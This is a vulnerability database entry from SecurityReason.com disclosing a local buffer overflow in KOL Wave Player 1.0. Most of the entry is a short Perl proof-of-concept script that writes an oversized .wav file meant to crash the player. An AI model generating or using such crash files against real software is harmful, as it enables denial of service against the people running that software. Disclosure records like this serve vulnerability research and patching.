SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

KOL Wave Player 1.0 .wav local buffer overflow


Arrow  WLB : WLB-2010010115  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-01-28
Arrow  Credit          : cr4wl3rn
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote : No
Arrow  Local     : Yes
Arrow  Status   : Bug

Arrow  History : [2010-01-28] Started

Arrow  Affected software :  KOL Wave Player version 1.0



Arrow  Text :  

#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.wav
>>>BOOM
#########################################################


print "#####################################################n";
print "[!] KOL Wave Player 1.0 (.wav) Local Buffer Overflow
PoCn";
print "n";
print "[!] Author: cr4wl3rn";
print "[!] Mail: cr4wl3r[!]linuxmail.orgn";
print "#####################################################n";


my $boom = "http://"."x41" x 1337;
my $filename = "b00m.wav";
open (FILE,">$filename");
print FILE "$boom";
print "nFile successfully created!n";



Audyt bezpieczeństwa

Security Audit

Analiza powłamaniowa

Arrow  References :  

None

If you want change this note, please use UCP



Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

Copyright © SecurityReason.com. All Rights Reserved.